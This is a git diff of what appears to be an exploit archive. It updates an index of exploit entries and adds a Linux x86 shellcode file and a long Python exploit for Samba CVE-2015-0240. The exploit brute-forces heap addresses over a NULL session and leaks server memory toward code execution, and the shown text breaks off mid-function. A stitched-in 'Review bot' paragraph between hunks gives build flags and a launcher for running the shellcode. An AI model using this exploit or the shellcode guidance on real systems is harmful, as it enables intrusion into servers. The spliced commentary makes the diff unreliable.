diff --git a/files.csv b/files.csv
index f45fee53c..fd5f88fd6 100755
--- a/files.csv
+++ b/files.csv
@@ -15008,7 +15008,7 @@ id,file,description,date,author,platform,type,port
 17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS <= 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow",2011-05-16,metasploit,windows,remote,0
 17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection Vulnerability",2011-05-17,Null-0x00,php,webapps,0
 17302,platforms/windows/local/17302.py,"Sonique 1.96 - (.m3u) Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0
-17303,platforms/php/webapps/17303.txt,"Joomla 1.0 Component jDownloads Arbitrary File Upload Vulnerability",2011-05-18,Al-Ghamdi,php,webapps,0
+17303,platforms/php/webapps/17303.txt,"Joomla 1.0 - Component jDownloads Arbitrary File Upload Vulnerability",2011-05-18,Al-Ghamdi,php,webapps,0
 17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0
 17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - ""nsiproxy.sys"" Local Kernel DoS Exploit",2011-05-18,"Lufeng Li",windows,dos,0
 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0
@@ -32972,13 +32972,10 @@ id,file,description,date,author,platform,type,port
 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0
 36554,platforms/php/webapps/36554.txt,"Wordpress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0
-36555,platforms/windows/local/36555.c,"BZR Player 1.03 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0
-36556,platforms/windows/local/36556.c,"ZIP Password Recovery Professional 7.1 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0
-36557,platforms/windows/local/36557.txt,"HTTrack Website Copier 3.48-21 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0
-36558,platforms/windows/local/36558.txt,"UltraISO 9.6.2.3059 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0
 36559,platforms/php/webapps/36559.txt,"Wordpress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
+36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitary Code Execution",2015-03-30,"Akhil Das",linux,remote,0
 36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
 36564,platforms/linux/local/36564.txt,"Fedora 21 - setroubleshootd Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0
 36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting 
Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
@@ -32991,6 +32988,7 @@ id,file,description,date,author,platform,type,port
 36572,platforms/php/webapps/36572.txt,"Toner Cart 'show_series_ink.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
 36573,platforms/php/webapps/36573.txt,"MMORPG Zone 'view_news.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
 36574,platforms/php/webapps/36574.txt,"Freelance Zone 'show_code.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
+36575,platforms/multiple/webapps/36575.py,"JBoss AS versions 3, 4, 5, 6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0
 36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0
 36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0
 36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,metasploit,windows,remote,0
@@ -33023,6 +33021,7 @@ id,file,description,date,author,platform,type,port
 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80
 36610,platforms/php/webapps/36610.txt,"Wordpress Video Gallery Plugin 2.8 - Multiple CSRF Vulnerabilities",2015-04-02,Divya,php,webapps,80
+36611,platforms/php/webapps/36611.txt,"Multiple UpThemes WordPress Themes - Arbitrary File Upload",2015-04-02,Divya,php,webapps,80
 36612,platforms/php/webapps/36612.txt,"Wordpress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80
 36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80
 36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80
@@ -33049,6 +33048,8 @@ id,file,description,date,author,platform,type,port
 36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
 36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component 'catid' Parameter Remote SQL Injection Vulnerability",2012-01-31,the_cyber_nuxbie,php,webapps,0
 36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component 'id' Parameter Remote SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
+36640,platforms/php/webapps/36640.txt,"WordPress Work The Flow File Upload 2.5.2 - Arbitrary File Upload Vulnerability",2015-04-05,"Claudio Viviani",php,webapps,0
+36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0
 36642,platforms/php/webapps/36642.txt,"Joomla! 'com_bbs' Component Multiple Remote SQL Injection Vulnerabilities",2012-01-30,the_cyber_nuxbie,php,webapps,0
 36643,platforms/php/webapps/36643.txt,"4images 1.7.10 admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0
 36644,platforms/php/webapps/36644.txt,"4images 1.7.10 admin/categories.php cat_parent_id Parameter XSS",2012-01-31,RandomStorm,php,webapps,0
@@ -33098,7 +33099,8 @@ id,file,description,date,author,platform,type,port
 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h 'path_to_admin/product.php' Cross Site Request Forgery Vulnerability",2012-02-10,DisK0nn3cT,php,webapps,0
 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0
 36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root",2015-04-09,xort,linux,remote,8000
-36692,platforms/osx/local/36692.py,"Mac OS X rootpipe Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
+36691,platforms/php/webapps/36691.txt,"Wordpress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80
+36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5, 10.8.2, 10.9.5 10.10.2 - rootpipe Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
 36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0
 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 SQL Injection and Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0
 36695,platforms/php/webapps/36695.txt,"Zimbra 'view' Parameter Cross Site Scripting Vulnerability",2012-02-13,sonyy,php,webapps,0
@@ -33106,7 +33108,7 @@ id,file,description,date,author,platform,type,port
 36697,platforms/php/webapps/36697.txt,"Nova CMS optimizer/index.php fileType Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
 36698,platforms/php/webapps/36698.txt,"Nova CMS includes/function/gets.php filename Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
 36699,platforms/php/webapps/36699.txt,"Nova CMS includes/function/usertpl.php conf[blockfile] Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
-36700,platforms/windows/local/36700.txt,"Elipse SCADA 2.29 b141 - DLL Hijacking",2015-04-10,"PETER CHENG",windows,local,0
+36701,platforms/lin_x86/shellcode/36701.c,"Create 'my.txt' Working Directory (37 Bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0
 36702,platforms/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_db_setup.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
 36703,platforms/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
 36704,platforms/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_display.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
@@ -33138,3 +33140,11 @@ id,file,description,date,author,platform,type,port
 36730,platforms/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
 36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_iplink.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
 36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ports.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
+36733,platforms/php/webapps/36733.txt,"Wordpress Plugin 'WP Mobile Edition' 2.7 - Remote File Disclosure Vulnerability",2015-04-13,"Khwanchai Kaewyos",php,webapps,0
+36735,platforms/php/webapps/36735.txt,"Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0
+36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0
+36738,platforms/php/webapps/36738.txt,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload Vulnerability",2015-04-13,"Claudio Viviani",php,webapps,0
+36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0
+36743,platforms/linux/dos/36743.c,"Linux Kernel splice() System Call - Local DoS",2015-04-13,"Emeric Nasi",linux,dos,0
+36744,platforms/windows/remote/36744.rb,"Adobe Flash Player casi32 Integer Overflow",2015-04-13,metasploit,windows,remote,0
+36745,platforms/osx/local/36745.rb,"Mac OS X ""Rootpipe"" Privilege Escalation",2015-04-13,metasploit,osx,local,0
diff --git a/platforms/lin_x86/shellcode/36701.c b/platforms/lin_x86/shellcode/36701.c
new file mode 100755
index 000000000..1af9bed15
--- /dev/null
+++ b/platforms/lin_x86/shellcode/36701.c
@@ -0,0 +1,58 @@
+/*
+#Title: Create 'my.txt' in present working directory of vulnerable software
+#Length: 37 bytes
+#Date: 3 April 2015
+#Author: Mohammad Reza Ramezani (mr.ramezani.edu [at] gmail com - g+)
+#Tested On: kali-linux-1.0.6-i386
+
+
+
+ Section .text
+global _start
+
+_start:
+push byte 8
+pop eax
+jmp short GoToCall
+shellcode:
+pop ebx
+xor edx, edx
+mov [ebx + 6], dl
+push word 0544o
+pop ecx
+int 0x80
+
+push byte 1
+pop eax
+xor ebx, ebx
+int 0x80
+
+
+GoToCall:
+call shellcode
+db 'my.txtX'
+
+
+ This shellcode can generalized by using of absolute path instead of 'my.txt'
+*/
+
+char shellcode[] = "\x6a\x08\x58\xeb\x14\x5b\x31\xd2"
+"\x88\x53\x06\x66\x68\x64\x01\x59\xcd\x80\x6a\x01\x58"
+"\x31\xdb\xcd\x80\xe8\xe7\xff\xff\xff\x6d\x79\x2e\x74"
+"\x78\x74\x58";
+
+int main()
+{
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int)shellcode;
+}
+
+
+int main()
+{
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int)shellcode;
+}
diff --git a/platforms/linux/dos/36741.py b/platforms/linux/dos/36741.py
new file mode 100755
index 000000000..f1b40e3ac
--- /dev/null
+++ b/platforms/linux/dos/36741.py
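Review bot: `int main()` is defined twice — the launcher at the end of the hunk is a verbatim copy of the one just above it — so the file fails to compile with a redefinition error; delete the second copy. The launcher itself, `ret = (int *)&ret + 2; (*ret) = (int)shellcode;`, assumes a particular 32-bit frame layout and an executable data segment, which only holds when built without stack protection and with executable data (for example `gcc -m32 -fno-stack-protector -z execstack`); the header records the test distro but not the build flags, so a one-line comment stating them would save the next reader a segfault, and a launcher that does not depend on frame layout is `((void (*)(void))shellcode)();`. Note also that the stub null-terminates the path in place (`mov [ebx + 6], dl` overwrites the trailing `X`), so the string must live in writable memory — true for the `char shellcode[]` array here, but worth a comment for anyone relocating it into a read-only section.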
@@ -0,0 +1,911 @@ +#!/usr/bin/python +""" +Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya + +The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by +ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' +in libtalloc does not write a value on 'creds' address. + +Reference: +- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ + +Note: +- heap might be changed while running exploit, need to try again (with '-hs' or '-pa' option) + if something failed + +Find heap address: +- ubuntu PIE heap start range: b7700000 - b9800000 +- start payload size: the bigger it is the lesser connection and binding time. + but need more time to shrink payload size +- payload is too big to fit in freed small hole. so payload is always at end + of heap +- start bruteforcing heap address from high memory address to low memory address + to prevent 'creds' pointed to real heap chunk (also no crash but not our payload) + +Leak info: +- heap layout is predictable because talloc_stackframe_pool(8192) is called after + accepted connection and fork but before calling smbd_server_connection_loop_once() +- before talloc_stackframe_pool(8192) is called, there are many holes in heap + but their size are <8K. so pool is at the end of heap at this time +- many data that allocated after talloc_stackframe_pool(8192) are allocated in pool. + with the same pattern of request, the layout in pool are always the same. +- many data are not allocated in pool but fit in free holes. so no small size data are + allocated after pool. +- normally there are only few data block allocated after pool. + - pool size: 0x2048 (included glibc heap header 4 bytes) + - a table that created in giconv_open(). the size is 0x7f88 (included glibc heap header 4 bytes) + - p->in_data.pdu.data. 
the size is 0x10e8 (included glibc heap header 4 bytes) + - this might not be allocated here because its size might fit in freed hole + - all fragment should be same size to prevent talloc_realloc() changed pdu.data size + - so last fragment should be padded + - ndr DATA_BLOB. the size is 0x10d0 (included glibc heap header 4 bytes) + - this might not be allocated here because its size might fit in freed hole + - p->in_data.data.data. the size is our netlogon data + - for 8K payload, the size is 0x2168 (included glibc heap header 4 bytes) + - this data is allocated by realloc(), grew by each fragment. so this memory + block is not allocated by mmapped even the size is very big. +- pool layout for interested data + - r->out offset from pool (talloc header) is 0x13c0 + - r->out.return_authenticator offset from pool is 0x13c0+0x18 + - overwrite this (with link unlink) to leak info in ServerPasswordSet response + - smb_request offset from pool (talloc header) is 0x11a0 + - smb_request.sconn offset from pool is 0x11a0+0x3c + - socket fd is at smb_request.sconn address (first struct member) +- more shared folder in configuration, more freed heap holes + - only if there is no or one shared, many data might be unexpected allocated after pool. + have to get that extra offset or bruteforce it + + +More exploitation detail in code (comment) ;) +""" + +import sys +import time +from struct import pack,unpack +import argparse + +import impacket +from impacket.dcerpc.v5 import transport, nrpc +from impacket.dcerpc.v5.ndr import NDRCALL +from impacket.dcerpc.v5.dtypes import WSTR + + +class Requester: + """ + put all smb request stuff into class. 
help my editor folding them + """ + + # impacket does not implement NetrServerPasswordSet + # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6) + class NetrServerPasswordSet(NDRCALL): + opnum = 6 + structure = ( + ('PrimaryName',nrpc.PLOGONSRV_HANDLE), + ('AccountName',WSTR), + ('SecureChannelType',nrpc.NETLOGON_SECURE_CHANNEL_TYPE), + ('ComputerName',WSTR), + ('Authenticator',nrpc.NETLOGON_AUTHENTICATOR), + ('UasNewPassword',nrpc.ENCRYPTED_NT_OWF_PASSWORD), + ) + # response is authenticator (8 bytes) and error code (4 bytes) + + # size of each field in sent packet + req_server_handle_size = 16 + req_username_hdr_size = 4 + 4 + 4 + 2 # max count, offset, actual count, trailing null + req_sec_type_size = 2 + req_computer_size = 4 + 4 + 4 + 2 + req_authenticator_size = 8 + 2 + 4 + req_new_pwd_size = 16 + req_presize = req_server_handle_size + req_username_hdr_size + req_sec_type_size + req_computer_size + req_authenticator_size + req_new_pwd_size + + samba_rpc_fragment_size = 4280 + netlogon_data_fragment_size = samba_rpc_fragment_size - 8 - 24 # 24 is dcerpc header size + + def __init__(self): + self.target = None + self.dce = None + + sessionKey = '\x00'*16 + # prepare ServerPasswordSet request + authenticator = nrpc.NETLOGON_AUTHENTICATOR() + authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey) + authenticator['Timestamp'] = 10 + + uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD() + uasNewPass['Data'] = '\x00'*16 + + self.serverName = nrpc.PLOGONSRV_HANDLE() + # ReferentID field of PrimaryName controls the uninitialized value of creds + self.serverName.fields['ReferentID'] = 0 + + self.accountName = WSTR() + + request = Requester.NetrServerPasswordSet() + request['PrimaryName'] = self.serverName + request['AccountName'] = self.accountName + request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel + request['ComputerName'] = '\x00' + request['Authenticator'] = authenticator + request['UasNewPassword'] = 
uasNewPass + self.request = request + + def set_target(self, target): + self.target = target + + def set_payload(self, s, pad_to_size=0): + if pad_to_size > 0: + s += '\x00'*(pad_to_size-len(s)) + pad_size = 0 + if len(s) < (16*1024+1): + ofsize = (len(s)+self.req_presize) % self.netlogon_data_fragment_size + if ofsize > 0: + pad_size = self.netlogon_data_fragment_size - ofsize + + self.accountName.fields['Data'] = s+'\x00'*pad_size+'\x00\x00' + self.accountName.fields['MaximumCount'] = None + self.accountName.fields['ActualCount'] = None + self.accountName.data = None # force recompute + + set_accountNameData = set_payload + + def get_dce(self): + if self.dce is None or self.dce.lostconn: + rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\PIPE\netlogon]' % self.target) + rpctransport.set_credentials('','') # NULL session + rpctransport.set_dport(445) + # force to 'NT LM 0.12' only + rpctransport.preferred_dialect('NT LM 0.12') + + self.dce = rpctransport.get_dce_rpc() + self.dce.connect() + self.dce.bind(nrpc.MSRPC_UUID_NRPC) + self.dce.lostconn = False + return self.dce + + def get_socket(self): + return self.dce.get_rpc_transport().get_socket() + + def force_dce_disconnect(self): + if not (self.dce is None or self.dce.lostconn): + self.get_socket().close() + self.dce.lostconn = True + + def request_addr(self, addr): + self.serverName.fields['ReferentID'] = addr + + dce = self.get_dce() + try: + dce.call(self.request.opnum, self.request) + answer = dce.recv() + return unpack("flags & TALLOC_FLAG_LOOP)) { + /* we have a free loop - stop looping */ + return 0; + } + """ + global fake_chunk_find_heap + payload = fake_chunk_find_heap*(payload_size/len(fake_chunk_find_heap)) + set_payload(payload) + addr_step = payload_size + addr = start_addr + i = 0 + while addr > stop_addr: + if i == 16: + print(" [*]trying addr: {:x}".format(addr)) + i = 0 + + if request_check_valid_addr(addr): + return addr + if first: + # first time, the last 16 bit is still do not 
know + # have to do extra check + if request_check_valid_addr(addr+0x10): + return addr+0x10 + addr -= addr_step + i += 1 + return None + +def find_valid_heap_exact_addr(addr, payload_size): + global fake_chunk_find_heap + fake_size = payload_size // 2 + while fake_size >= len(fake_chunk_find_heap): + payload = fake_chunk_find_heap*(fake_size/len(fake_chunk_find_heap)) + set_payload(payload, payload_size) + if not request_check_valid_addr(addr): + addr -= fake_size + fake_size = fake_size // 2 + + set_payload('\x00'*16 + pack("= target_payload_size: + force_dce_disconnect() + found_addr = None + for i in range(3): + found_addr = find_valid_heap_addr(start_addr, stop_addr, payload_size, good_addr is None) + if found_addr is not None: + break + if found_addr is None: + # failed + good_addr = None + break + good_addr = found_addr + print(" [*] found valid addr ({:d}KB): {:x}".format(payload_size//1024, good_addr)) + start_addr = good_addr + stop_addr = good_addr - payload_size + 0x20 + payload_size //= 2 + + if good_addr is not None: + # try 3 times to find exact address. if address cannot be found, assume + # minimizing payload size is not correct. 
start minimizing again + for i in range(3): + heap_addr = find_valid_heap_exact_addr(good_addr, target_payload_size) + if heap_addr != 0: + break + force_dce_disconnect() + + if heap_addr == 0: + print(' [-] failed to find payload adress') + # start from last good address + some offset + start_addr = (good_addr + 0x10000) & 0xffff0000 + print('[*] bruteforcing heap adress again from {:x}'.format(start_addr)) + + payload_addr = heap_addr - len(fake_chunk_find_heap) + print(" [+] found payload addr: {:x}".format(payload_addr)) + return payload_addr + + +######## +# leak info +######## + +def addr2utf_prefix(addr): + def is_badchar(v): + return (v >= 0xd8) and (v <= 0xdf) + + prefix = 0 # safe + if is_badchar((addr)&0xff) or is_badchar((addr>>16)&0xff): + prefix |= 2 # cannot have prefix + if is_badchar((addr>>8)&0xff) or is_badchar((addr>>24)&0xff): + prefix |= 1 # must have prefix + return prefix + +def leak_info_unlink(payload_addr, next_addr, prev_addr, retry=True, call_only=False): + """ + Note: + - if next_addr and prev_addr are not zero, they must be writable address + because of below code in _talloc_free_internal() + if (tc->prev) tc->prev->next = tc->next; + if (tc->next) tc->next->prev = tc->prev; + """ + # Note: U+D800 to U+DFFF is reserved (also bad char for samba) + # check if '\x00' is needed to avoid utf16 badchar + prefix_len = addr2utf_prefix(next_addr) | addr2utf_prefix(prev_addr) + if prefix_len == 3: + return None # cannot avoid badchar + if prefix_len == 2: + prefix_len = 0 + + fake_chunk_leak_info = pack(" wrong answer + force_dce_disconnect() # heap is corrupted, disconnect it + + return answers + +def leak_info_addr(payload_addr, r_out_addr, leak_addr, retry=True): + # leak by replace r->out.return_authenticator pointer + # Note: because leak_addr[4:8] will be replaced with r_out_addr + # only answers[0] and answers[2] are leaked + return leak_info_unlink(payload_addr, leak_addr, r_out_addr, retry) + +def leak_info_addr2(payload_addr, 
r_out_addr, leak_addr, retry=True): + # leak by replace r->out.return_authenticator pointer + # Note: leak_addr[0:4] will be replaced with r_out_addr + # only answers[1] and answers[2] are leaked + return leak_info_unlink(payload_addr, r_out_addr-4, leak_addr-4, retry) + +def leak_uint8t_addr(payload_addr, r_out_addr, chunk_addr): + # leak name field ('uint8_t') in found heap chunk + # do not retry this leak, because r_out_addr is guessed + answers = leak_info_addr(payload_addr, r_out_addr, chunk_addr + 0x18, False) + if answers is None: + return None + if answers[2] != TALLOC_MAGIC: + force_dce_disconnect() + return None + + return answers[0] + +def leak_info_find_offset(info): + # offset from pool to payload still does not know + print("[*] guessing 'r' offset and leaking 'uint8_t' address ...") + chunk_addr = info['chunk_addr'] + uint8t_addr = None + r_addr = None + r_out_addr = None + while uint8t_addr is None: + # 0x8c10 <= 4 + 0x7f88 + 0x2044 - 0x13c0 + # 0x9ce0 <= 4 + 0x7f88 + 0x10d0 + 0x2044 - 0x13c0 + # 0xadc8 <= 4 + 0x7f88 + 0x10e8 + 0x10d0 + 0x2044 - 0x13c0 + # 0xad40 is extra offset when no share on debian + # 0x10d38 is extra offset when only [printers] is shared on debian + for offset in (0x8c10, 0x9ce0, 0xadc8, 0xad40, 0x10d38): + r_addr = chunk_addr - offset + # 0x18 is out.authenticator offset + r_out_addr = r_addr + 0x18 + print(" [*] try 'r' offset 0x{:x}, r_out addr: 0x{:x}".format(offset, r_out_addr)) + + uint8t_addr = leak_uint8t_addr(info['payload_addr'], r_out_addr, chunk_addr) + if uint8t_addr is not None: + print(" [*] success") + break + print(" [-] failed") + if uint8t_addr is None: + return False + + info['uint8t_addr'] = uint8t_addr + info['r_addr'] = r_addr + info['r_out_addr'] = r_out_addr + info['pool_addr'] = r_addr - 0x13c0 + + print(" [+] text 'uint8_t' addr: {:x}".format(info['uint8t_addr'])) + print(" [+] pool addr: {:x}".format(info['pool_addr'])) + + return True + +def leak_sock_fd(info): + # leak sock fd from + # 
smb_request->sconn->sock + # (offset: ->0x3c ->0x0 ) + print("[*] leaking socket fd ...") + info['smb_request_addr'] = info['pool_addr']+0x11a0 + print(" [*] smb request addr: {:x}".format(info['smb_request_addr'])) + answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr']+0x3c-4) + if answers is None: + print(' [-] cannot leak sconn_addr address :(') + return None + force_dce_disconnect() # heap is corrupted, disconnect it + sconn_addr = answers[2] + info['sconn_addr'] = sconn_addr + print(' [+] sconn addr: {:x}'.format(sconn_addr)) + + # write in padding of chunk, no need to disconnect + answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], sconn_addr) + if answers is None: + print('cannot leak sock_fd address :(') + return None + sock_fd = answers[1] + print(' [+] sock fd: {:d}'.format(sock_fd)) + info['sock_fd'] = sock_fd + return sock_fd + +def leak_talloc_pop_addr(info): + # leak destructor talloc_pop() address + # overwrite name field, no need to disconnect + print('[*] leaking talloc_pop address') + answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], info['pool_addr'] + 0x14) + if answers is None: + print(' [-] cannot leak talloc_pop() address :(') + return None + if answers[2] != 0x2010: # chunk size must be 0x2010 + print(' [-] cannot leak talloc_pop() address. 
answers[2] is wrong :(') + return None + talloc_pop_addr = answers[0] + print(' [+] talloc_pop addr: {:x}'.format(talloc_pop_addr)) + info['talloc_pop_addr'] = talloc_pop_addr + return talloc_pop_addr + +def leak_smbd_server_connection_handler_addr(info): + # leak address from + # smbd_server_connection.smb1->fde ->handler + # (offset: ->0x9c->0x14 ) + # MUST NOT disconnect after getting smb1_fd_event address + print('[*] leaking smbd_server_connection_handler address') + def real_leak_conn_handler_addr(info): + answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['sconn_addr'] + 0x9c) + if answers is None: + print(' [-] cannot leak smb1_fd_event address :(') + return None + smb1_fd_event_addr = answers[1] + print(' [*] smb1_fd_event addr: {:x}'.format(smb1_fd_event_addr)) + + answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], smb1_fd_event_addr+0x14) + if answers is None: + print(' [-] cannot leak smbd_server_connection_handler address :(') + return None + force_dce_disconnect() # heap is corrupted, disconnect it + smbd_server_connection_handler_addr = answers[0] + diff = info['talloc_pop_addr'] - smbd_server_connection_handler_addr + if diff > 0x2000000 or diff < 0: + print(' [-] get wrong smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr)) + smbd_server_connection_handler_addr = None + return smbd_server_connection_handler_addr + + smbd_server_connection_handler_addr = None + while smbd_server_connection_handler_addr is None: + smbd_server_connection_handler_addr = real_leak_conn_handler_addr(info) + + print(' [+] smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr)) + info['smbd_server_connection_handler_addr'] = smbd_server_connection_handler_addr + + return smbd_server_connection_handler_addr + +def find_smbd_base_addr(info): + # estimate smbd_addr from talloc_pop + if (info['talloc_pop_addr'] & 0xf) != 0 or (info['smbd_server_connection_handler_addr'] & 
0xf) != 0: + # code has no alignment + start_addr = info['smbd_server_connection_handler_addr'] - 0x124000 + else: + start_addr = info['smbd_server_connection_handler_addr'] - 0x130000 + start_addr = start_addr & 0xfffff000 + stop_addr = start_addr - 0x20000 + + print('[*] finding smbd loaded addr ...') + while True: + smbd_addr = start_addr + while smbd_addr >= stop_addr: + if addr2utf_prefix(smbd_addr-8) == 3: + # smbd_addr is 0xb?d?e000 + test_addr = smbd_addr - 0x800 - 4 + else: + test_addr = smbd_addr - 8 + # test writable on test_addr + answers = leak_info_addr(info['payload_addr'], 0, test_addr, retry=False) + if answers is not None: + break + smbd_addr -= 0x1000 # try prev page + if smbd_addr > stop_addr: + break + print(' [-] failed. try again.') + + info['smbd_addr'] = smbd_addr + print(' [+] found smbd loaded addr: {:x}'.format(smbd_addr)) + +def dump_mem_call_addr(info, target_addr): + # leak pipes_struct address from + # smbd_server_connection->chain_fsp->fake_file_handle->private_data + # (offset: ->0x48 ->0xd4 ->0x4 ) + # Note: + # - MUST NOT disconnect because chain_fsp,fake_file_handle,pipes_struct address will be changed + # - target_addr will be replaced with current_pdu_sent address + # check read_from_internal_pipe() in source3/rpc_server/srv_pipe_hnd.c + print(' [*] overwrite current_pdu_sent for dumping memory ...') + answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr'] + 0x48) + if answers is None: + print(' [-] cannot leak chain_fsp address :(') + return False + chain_fsp_addr = answers[1] + print(' [*] chain_fsp addr: {:x}'.format(chain_fsp_addr)) + + answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], chain_fsp_addr+0xd4, retry=False) + if answers is None: + print(' [-] cannot leak fake_file_handle address :(') + return False + fake_file_handle_addr 